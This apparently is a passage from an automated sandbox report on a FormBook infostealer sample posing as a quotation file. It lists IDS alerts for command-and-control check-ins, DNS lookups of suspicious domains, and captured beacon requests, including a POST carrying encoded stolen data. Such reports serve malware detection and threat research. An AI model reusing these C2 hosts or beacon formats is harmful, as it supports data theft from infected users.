                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49884 -> 104.21.32.1:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.30:49894 -> 47.83.1.90:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.30:49869 -> 103.106.67.112:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.30:49878 -> 194.9.94.85:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49841 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49827 -> 104.21.32.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49828 -> 104.21.32.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49859 -> 202.95.11.110:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49871 -> 104.21.32.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49857 -> 202.95.11.110:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49880 -> 45.33.2.79:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49889 -> 199.192.21.169:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.30:49873 -> 104.21.32.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49900 -> 160.25.166.123:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49885 -> 104.21.32.1:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.30:49848 -> 160.25.166.123:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49904 -> 172.67.132.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49874 -> 47.83.1.90:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49861 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49829 -> 104.21.32.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49887 -> 199.192.21.169:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.30:49852 -> 172.67.132.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49833 -> 199.192.21.169:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49881 -> 45.33.2.79:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49870 -> 104.21.32.1:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.30:49882 -> 45.33.2.79:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49862 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.30:49902 -> 160.25.166.123:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49895 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49905 -> 172.67.132.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49896 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49867 -> 103.106.67.112:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.30:49890 -> 199.192.21.169:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49865 -> 103.106.67.112:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49879 -> 45.33.2.79:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49899 -> 160.25.166.123:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49903 -> 172.67.132.227:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.30:49877 -> 47.83.1.90:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49901 -> 160.25.166.123:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49893 -> 47.83.1.90:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49891 -> 47.83.1.90:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.30:49906 -> 172.67.132.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49897 -> 13.248.169.48:80
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.furrcali.xyz
                Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                Source: Joe Sandbox ViewIP Address: 103.106.67.112 103.106.67.112
                Source: Joe Sandbox ViewASN Name: GIGAINFRASoftbankBBCorpJP GIGAINFRASoftbankBBCorpJP
                Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
                Source: Joe Sandbox ViewASN Name: VOYAGERNET-AS-APVoyagerInternetLtdNZ VOYAGERNET-AS-APVoyagerInternetLtdNZ
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.30:49866 -> 23.51.25.15:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.30:49816 -> 23.51.25.15:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.30:49834 -> 23.51.25.15:443
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: 2_2_0013CE44 InternetReadFile,SetEvent,GetLastError,SetEvent,2_2_0013CE44
                Source: global trafficHTTP traffic detected: GET /js1x/?80k=lRapCPMXgDk&6B-l7F=YzadGC6YqOgjY/9t8WEBSxHCudcKSJxp0CcLO+Xh8dJmB8CdhvgUA7hRZF2xLQJtMCWb5Kgxi+xGIwqq0R102ShiT2rp0EsU7QKswOCkfsfu+tPWB6ee9FA= HTTP/1.1Host: www.milp.storeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficHTTP traffic detected: GET /jwa9/?6B-l7F=nbEb6BapjrCYd3vuEk68dRLY4ua2Mo84Z9DLelTcrJ4p8hOiBplI39ztzhaal76qFYKe8ooJF22mI/JvRPR9KZtEPsGPSZvpHz4gKTT9RHcltuCAAAk51J4=&80k=lRapCPMXgDk HTTP/1.1Host: www.chiro.liveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficHTTP traffic detected: GET /3u0p/?6B-l7F=s2YzwEkhsdaL/kJXp3k+A3KGmeJ3qBEv9AUKdpz0O4EFo1wYmv8+70PTeuLpJbel1HoKntoiuCCwLjgxW1UIuCv8mzvY6w9FRbC+/7SrF93BKOupqiEzChM=&80k=lRapCPMXgDk HTTP/1.1Host: www.mzkd6gp5.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficHTTP traffic detected: GET /qps0/?6B-l7F=oe/Nf5ZxPavzyNCN5fJJ2OrxgayHc7sFQb4gcz6uUjnOuiLJkTwk1EFGD/G87FIa6dxrZOgAQGccmvtK4ohyPgEShywSULdIISv/2iuVOPOn5EuQA8dSwoA=&80k=lRapCPMXgDk HTTP/1.1Host: www.bokus.siteAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficHTTP traffic detected: GET /nkmx/?6B-l7F=eUQnbnMYY/LCOqGDejL9TQzNqDkA9lUjsamtmjAjCJYjPTSalXudwPcRr9EknZYtOZpCljWDkwtbq6MUXcKSC+3UVsfypEs97CYth/8fPOW7Uk3kTT+8ArA=&80k=lRapCPMXgDk HTTP/1.1Host: www.givvjn.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficHTTP traffic detected: GET /t3iv/?80k=lRapCPMXgDk&6B-l7F=P136bSYw/boin6uqIxZ+PLa4sXTYWAHk9qKLeTmXrWAePyaHTSDMFoauBTWx0ig1S3CVFsx30iUtjRVQiBy55I3Yp99Gh3kk8H5H2CMMqknG4ydwL3V23OA= HTTP/1.1Host: www.bonheur.techAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficHTTP traffic detected: GET /bwjl/?6B-l7F=DlXUXSIcZnIsgzlziINoOaBHIWRz+kGepY2CMnKH5/Z+wLXeqyLz34dEMj2dm6NLuVk54f0N3OpI5VHZ7BJAsS5zdqtXFQ+nWWO+v1ALJkcTW8WFFCOZqPs=&80k=lRapCPMXgDk HTTP/1.1Host: www.rpa.asiaAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficHTTP traffic detected: GET /kj1o/?80k=lRapCPMXgDk&6B-l7F=aFAzn/LT2mOAaNQADN8poQDHC/ShywB+MmjNXW9rGStYTR2loNwIsxAevG8AaM/8DgC1YrG7rp0i0fn4DlXpdNAv+6uTj4+oUBXQsmt/Lr8OGOl6Yl/nOLw= HTTP/1.1Host: www.ogbos88.cyouAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficHTTP traffic detected: GET /cxj4/?80k=lRapCPMXgDk&6B-l7F=gKtC9mpNHTkTr00JCblrl8a3AfTX/duoM8EbXMKNjeYmEZtcGajyBctrWO6oEHOoogFTlfS8+DNQw55D2MfCqAhjIjNgZ6kwkHLqIJ6FVQVj1Nnq3yix8Cc= HTTP/1.1Host: www.100millionjobs.africaAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficHTTP traffic detected: GET /wbfy/?6B-l7F=Xeeb3ImT6ZQQytgApKylbK7mnw/Uy82KlqPkukVQbKRvaGCiHgrQQJpKPHE9m9OFKl001Zh7fqviaNy8QasigmVtVgrnFrjMGvUSPSWgMjv1orXfOBS8k1A=&80k=lRapCPMXgDk HTTP/1.1Host: www.mirenzhibo.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficHTTP traffic detected: GET /kgjj/?6B-l7F=m0PzV+DL9MdhQie9ia/fmr3XBWpQsDf/lotYUX+AhjMoQA7F3K3FjPv8kV/QBw/PdU/OXM/ri/IbrFYG4xypiABwnaSWREGU3uu7ZafkuM6Gl/4SxdxZjgo=&80k=lRapCPMXgDk HTTP/1.1Host: www.nextlevel.financeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficHTTP traffic detected: GET /k29t/?6B-l7F=mLM4NyV3Rm7LSF6x/a3vps0uRUV7zEkflC/cwX9Xx9eDQBJ7/gNt59cujgLWGeygpdsHuHQ6ZT1nZEeE6AzqPDDMRo6XGpuD1XHiaXyxOjElLsGmAN2m/Z8=&80k=lRapCPMXgDk HTTP/1.1Host: www.furrcali.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficHTTP traffic detected: GET /w98i/?6B-l7F=UfwHaNGeM7ohZqxLfFoMCRROWED3zeeFYxLhiKeMkeFhJQngpiBu1nR/iO/Vw2KMOuQK2IyXNyNkQANnRhWnyAeSvZ4PYAj0T7gn5VntXdX45GkikqbyqPY=&80k=lRapCPMXgDk HTTP/1.1Host: www.buyspeechst.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficHTTP traffic detected: GET /gcvb/?6B-l7F=R3JWUl3ivpsXcFtFFeliieQU9JuOkkLjcoMED/ZSuHZ0i4hSpIKzgOSsfpnIAqnHyqi+O0adg4Vr07jACry21CI+4oE0/hewEO2O8IWqeYD/JQ6qTGavsAY=&80k=lRapCPMXgDk HTTP/1.1Host: www.lejgnu.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficHTTP traffic detected: GET /js1x/?80k=lRapCPMXgDk&6B-l7F=YzadGC6YqOgjY/9t8WEBSxHCudcKSJxp0CcLO+Xh8dJmB8CdhvgUA7hRZF2xLQJtMCWb5Kgxi+xGIwqq0R102ShiT2rp0EsU7QKswOCkfsfu+tPWB6ee9FA= HTTP/1.1Host: www.milp.storeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficHTTP traffic detected: GET /jwa9/?6B-l7F=nbEb6BapjrCYd3vuEk68dRLY4ua2Mo84Z9DLelTcrJ4p8hOiBplI39ztzhaal76qFYKe8ooJF22mI/JvRPR9KZtEPsGPSZvpHz4gKTT9RHcltuCAAAk51J4=&80k=lRapCPMXgDk HTTP/1.1Host: www.chiro.liveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficHTTP traffic detected: GET /3u0p/?6B-l7F=s2YzwEkhsdaL/kJXp3k+A3KGmeJ3qBEv9AUKdpz0O4EFo1wYmv8+70PTeuLpJbel1HoKntoiuCCwLjgxW1UIuCv8mzvY6w9FRbC+/7SrF93BKOupqiEzChM=&80k=lRapCPMXgDk HTTP/1.1Host: www.mzkd6gp5.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficHTTP traffic detected: GET /qps0/?6B-l7F=oe/Nf5ZxPavzyNCN5fJJ2OrxgayHc7sFQb4gcz6uUjnOuiLJkTwk1EFGD/G87FIa6dxrZOgAQGccmvtK4ohyPgEShywSULdIISv/2iuVOPOn5EuQA8dSwoA=&80k=lRapCPMXgDk HTTP/1.1Host: www.bokus.siteAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficHTTP traffic detected: GET /nkmx/?6B-l7F=eUQnbnMYY/LCOqGDejL9TQzNqDkA9lUjsamtmjAjCJYjPTSalXudwPcRr9EknZYtOZpCljWDkwtbq6MUXcKSC+3UVsfypEs97CYth/8fPOW7Uk3kTT+8ArA=&80k=lRapCPMXgDk HTTP/1.1Host: www.givvjn.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficHTTP traffic detected: GET /t3iv/?80k=lRapCPMXgDk&6B-l7F=P136bSYw/boin6uqIxZ+PLa4sXTYWAHk9qKLeTmXrWAePyaHTSDMFoauBTWx0ig1S3CVFsx30iUtjRVQiBy55I3Yp99Gh3kk8H5H2CMMqknG4ydwL3V23OA= HTTP/1.1Host: www.bonheur.techAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficHTTP traffic detected: GET /bwjl/?6B-l7F=DlXUXSIcZnIsgzlziINoOaBHIWRz+kGepY2CMnKH5/Z+wLXeqyLz34dEMj2dm6NLuVk54f0N3OpI5VHZ7BJAsS5zdqtXFQ+nWWO+v1ALJkcTW8WFFCOZqPs=&80k=lRapCPMXgDk HTTP/1.1Host: www.rpa.asiaAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficHTTP traffic detected: GET /kj1o/?80k=lRapCPMXgDk&6B-l7F=aFAzn/LT2mOAaNQADN8poQDHC/ShywB+MmjNXW9rGStYTR2loNwIsxAevG8AaM/8DgC1YrG7rp0i0fn4DlXpdNAv+6uTj4+oUBXQsmt/Lr8OGOl6Yl/nOLw= HTTP/1.1Host: www.ogbos88.cyouAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficDNS traffic detected: DNS query: www.milp.store
                Source: global trafficDNS traffic detected: DNS query: www.chiro.live
                Source: global trafficDNS traffic detected: DNS query: www.mzkd6gp5.top
                Source: global trafficDNS traffic detected: DNS query: www.bokus.site
                Source: global trafficDNS traffic detected: DNS query: www.elettrocoltura.info
                Source: global trafficDNS traffic detected: DNS query: www.givvjn.info
                Source: global trafficDNS traffic detected: DNS query: www.bonheur.tech
                Source: global trafficDNS traffic detected: DNS query: www.rpa.asia
                Source: global trafficDNS traffic detected: DNS query: www.ogbos88.cyou
                Source: global trafficDNS traffic detected: DNS query: www.smartbath.shop
                Source: global trafficDNS traffic detected: DNS query: www.100millionjobs.africa
                Source: global trafficDNS traffic detected: DNS query: www.mirenzhibo.net
                Source: global trafficDNS traffic detected: DNS query: www.nextlevel.finance
                Source: global trafficDNS traffic detected: DNS query: www.furrcali.xyz
                Source: global trafficDNS traffic detected: DNS query: www.buyspeechst.shop
                Source: global trafficDNS traffic detected: DNS query: www.lejgnu.info
                Source: unknownHTTP traffic detected: POST /jwa9/ HTTP/1.1Host: www.chiro.liveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,enConnection: closeCache-Control: no-cacheContent-Length: 203Content-Type: application/x-www-form-urlencodedOrigin: http://www.chiro.liveReferer: http://www.chiro.live/jwa9/User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30Data Raw: 36 42 2d 6c 37 46 3d 71 5a 73 37 35 31 75 39 68 4a 6a 45 62 31 62 57 4b 43 2f 49 59 6a 66 30 74 63 71 2f 61 71 46 51 5a 65 72 4a 55 45 2b 4d 72 70 30 61 7a 51 6d 75 45 61 6f 4c 2b 76 66 52 72 7a 69 56 36 5a 79 71 4b 70 58 61 2f 35 59 43 4f 6a 57 69 45 49 41 58 48 65 74 2b 58 4b 39 6d 49 63 6d 79 42 62 54 50 4f 52 34 78 58 52 2f 4f 66 30 38 4e 39 65 72 65 45 43 46 4a 79 61 6f 4d 51 48 78 52 6d 42 31 34 35 49 4d 6f 6e 4e 74 73 2b 6a 56 54 79 69 4f 61 43 63 45 4b 68 49 36 77 7a 64 34 78 57 49 34 33 32 56 4b 6e 4d 4d 30 6c 58 56 53 4a 6f 49 77 5a 33 4b 4c 4f 54 37 34 72 6e 7a 7a 6b 43 57 72 52 43 67 3d 3d Data Ascii: 6B-l7F=qZs751u9hJjEb1bWKC/IYjf0tcq/aqFQZerJUE+Mrp0azQmuEaoL+vfRrziV6ZyqKpXa/5YCOjWiEIAXHet+XK9mIcmyBbTPOR4xXR/Of08N9ereECFJyaoMQHxRmB145IMonNts+jVTyiOaCcEKhI6wzd4xWI432VKnMM0lXVSJoIwZ3KLOT74rnzzkCWrRCg==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 15:54:21 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8NE7Oz%2BRLdH3W%2BbqQhjSXugvdGh%2FH38aCfWPFbFr0aCu5gajtSSSYCL1v%2F43SboHEgw2tsWzPFfIpOBpTGqlEtkFtDypRYCnVq8NrckcD4Ai8626gRqLRXzJUm%2BR5mhw%2Bc9H"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ff59af9e876e269-ORDContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=124098&min_rtt=124098&rtt_var=62049&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=799&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 